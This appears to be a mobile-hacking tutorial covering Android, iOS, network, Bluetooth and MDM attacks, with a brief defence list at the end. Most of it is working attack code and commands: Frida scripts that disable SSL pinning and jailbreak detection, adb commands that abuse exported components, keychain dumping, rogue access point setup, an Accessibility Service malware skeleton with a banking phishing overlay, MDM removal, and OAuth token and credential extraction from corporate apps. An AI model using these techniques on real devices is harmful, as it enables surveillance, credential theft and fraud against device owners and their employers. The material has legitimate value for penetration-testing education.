Mobile Attacks: Hacking the Device in Every Pocket
Mobile devices are always on, always connected, and hold our most sensitive data. From app vulnerabilities to baseband exploits, mobile security is a constantly evolving battlefield between attackers and defenders.
Why Mobile Matters
Mobile devices contain email, banking apps, MFA tokens, corporate data, and personal photos. They track location 24/7. Compromising a mobile device often means compromising the entire digital life of the target—and their employer.
Mobile Architecture & Attack Surface
┌─────────────────────────────────────────────────────────────────────┐
│ MOBILE ATTACK SURFACE │
├─────────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
│ │ PHYSICAL │ │ NETWORK │ │ APPLICATION │ │
│ │ USB Debug │ │ WiFi/BT/Cell │ │ App vulns │ │
│ │ Juice Jacking│ │ MITM attacks │ │ Malicious │ │
│ │ Evil Maid │ │ Rogue AP │ │ Deeplinks │ │
│ └──────────────┘ └──────────────┘ └──────────────┘ │
│ │ │ │ │
│ └─────────────────┼─────────────────┘ │
│ ▼ │
│ ┌─────────────────────────────────────────────────────────────┐ │
│ │ OPERATING SYSTEM │ │
│ │ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │ │
│ │ │ Kernel │ │ Sandbox │ │ Keychain/ │ │ │
│ │ │ Exploits │ │ Escapes │ │ Keystore │ │ │
│ │ └─────────────┘ └─────────────┘ └─────────────┘ │ │
│ └─────────────────────────────────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────────────────────┐ │
│ │ HARDWARE/BASEBAND │ │
│ │ Secure Enclave, TrustZone, Baseband processor │ │
│ └─────────────────────────────────────────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────────┘
Android Attacks
APK Analysis
# Decompile APK
apktool d target.apk -o decompiled/
# Convert to Java source
jadx -d output/ target.apk
# Look for hardcoded secrets
grep -rE '(api[_-]?key|password|secret|token)' decompiled/
grep -rE 'https?://[a-zA-Z0-9.-]+' decompiled/ # Find URLs
# Check AndroidManifest.xml
cat decompiled/AndroidManifest.xml | grep -E 'exported|permission|intent'
# Find SQL injection points
grep -r "rawQuery\|execSQL" output/Dynamic Analysis
# Frida hooks for Android
frida -U -f com.target.app -l script.js
# Bypass SSL pinning
frida -U -f com.target.app -l ssl_bypass.js
# Common Frida scripts
# - SSL pinning bypass
# - Root detection bypass
# - Encryption key extraction
# - Function hooking
# Objection (Frida wrapper)
objection -g com.target.app explore
objection> android sslpinning disable
objection> android root disableExploiting Android Components
# Exported Activities - launch without authentication
adb shell am start -n com.target.app/.AdminActivity
# Content Providers - data theft
adb shell content query --uri content://com.target.app.provider/users
# Broadcast Receivers - trigger actions
adb shell am broadcast -a com.target.ADMIN_ACTION
# Deep Links - bypass navigation
adb shell am start -a android.intent.action.VIEW \
-d "app://target/admin/reset?user=victim"ADB Exploitation
# Check for exposed ADB
nmap -p 5555 TARGET_IP
adb connect TARGET_IP:5555
# Extract app data (requires root or debuggable app)
adb backup -f backup.ab com.target.app
java -jar abe.jar unpack backup.ab backup.tar
# Install malicious app
adb install malware.apk
# Screen capture and keylogging
adb shell screencap -p /sdcard/screen.png
adb shell getevent # Raw input eventsiOS Attacks
IPA Analysis
# Unzip IPA (it's just a ZIP)
unzip target.ipa -d extracted/
# Decrypt app binary (requires jailbroken device)
# Use frida-ios-dump or clutch
# Analyze binary
otool -L Payload/App.app/App # List libraries
strings Payload/App.app/App | grep -i key
class-dump Payload/App.app/App > headers.h
# Check for insecure data storage
plutil -p extracted/Payload/App.app/Info.plistKeychain Extraction
# On jailbroken device
keychain-dumper
# Via Frida
frida -U -f com.target.app -l keychain_dump.js
# Common keychain items:
# - Authentication tokens
# - API keys
# - Passwords
# - CertificatesiOS-Specific Attacks
// Frida script to bypass jailbreak detection
var jailbreakPaths = [
"/Applications/Cydia.app",
"/usr/sbin/sshd",
"/private/var/stash"
];
Interceptor.attach(Module.findExportByName(null, "stat"), {
onEnter: function(args) {
var path = Memory.readUtf8String(args[0]);
if (jailbreakPaths.includes(path)) {
args[0] = Memory.allocUtf8String("/nonexistent");
}
}
});Mobile Network Attacks
Man-in-the-Middle
# Set up rogue AP
hostapd -B hostapd.conf
dnsmasq -C dnsmasq.conf
# Capture traffic
mitmproxy -p 8080
# For SSL interception
mitmproxy --mode transparent --ssl-insecure
# Push certificate to Android
adb push mitmproxy-ca-cert.cer /sdcard/
# Then install via Settings > SecuritySSL Pinning Bypass
// Universal SSL pinning bypass (Frida)
Java.perform(function() {
var TrustManager = Java.use('javax.net.ssl.X509TrustManager');
var SSLContext = Java.use('javax.net.ssl.SSLContext');
var TrustAllManager = Java.registerClass({
name: 'TrustAllManager',
implements: [TrustManager],
methods: {
checkClientTrusted: function(chain, authType) {},
checkServerTrusted: function(chain, authType) {},
getAcceptedIssuers: function() { return []; }
}
});
var ctx = SSLContext.getInstance("TLS");
ctx.init(null, [TrustAllManager.$new()], null);
SSLContext.setDefault(ctx);
});Bluetooth Attacks
# Bluetooth reconnaissance
hcitool scan
hcitool inq
# BLE enumeration
gatttool -b TARGET_MAC -I
> connect
> primary
> characteristics
# Bluetooth sniffing
btlejack -c TARGET_MAC
# Common BLE vulnerabilities:
# - Unencrypted characteristics
# - Authentication bypass
# - Replay attacksMobile Malware Techniques
Android Malware Capabilities
// Accessibility Service abuse (Android)
public class MaliciousAccessibilityService extends AccessibilityService {
@Override
public void onAccessibilityEvent(AccessibilityEvent event) {
// Capture all screen content
String text = event.getText().toString();
// Perform clicks
performGlobalAction(GLOBAL_ACTION_BACK);
// Overlay attacks
if (event.getPackageName().equals("com.bank.app")) {
showPhishingOverlay();
}
}
}Spyware Features
| Capability | Android Permission | iOS Equivalent |
|---|---|---|
| Location tracking | ACCESS_FINE_LOCATION | Location Services |
| Call recording | RECORD_AUDIO + READ_PHONE_STATE | Requires jailbreak |
| SMS interception | READ_SMS, RECEIVE_SMS | Requires jailbreak |
| Camera access | CAMERA | Camera permission |
| Keylogging | Accessibility Service | Requires jailbreak |
MDM & Enterprise Attacks
MDM Bypass Techniques
# Android - Remove MDM profile
# Requires root or ADB access
adb shell pm disable-user com.mdm.agent
# iOS - MDM profile removal
# On jailbroken device, delete:
/var/db/ConfigurationProfiles/
# Prevent MDM enrollment
# Block MDM server at network level
iptables -A OUTPUT -d mdm.company.com -j DROPCorporate App Attacks
# Extract corporate app data
adb backup -f corp.ab -noapk com.corp.email
java -jar abe.jar unpack corp.ab corp.tar
# Look for cached credentials
find . -name "*.db" -exec sqlite3 {} ".dump" \; | grep -i password
# OAuth token theft
grep -r "access_token\|refresh_token" .Essential Mobile Testing Tools
| Tool | Platform | Purpose |
|---|---|---|
| Frida | Both | Dynamic instrumentation, hooking |
| Objection | Both | Runtime mobile exploration (Frida-based) |
| MobSF | Both | Automated static/dynamic analysis |
| apktool/jadx | Android | APK decompilation |
| class-dump | iOS | Objective-C class extraction |
| Burp Suite | Both | HTTP/S traffic interception |
Detection & Protection
Mobile Defense Strategies
- MDM Enrollment: Enforce policies, remote wipe capability
- App Vetting: Scan apps before deployment
- Certificate Pinning: Prevent MITM attacks
- Root/Jailbreak Detection: Identify compromised devices
- Biometric Auth: Stronger than PINs
- Network Monitoring: Detect suspicious traffic patterns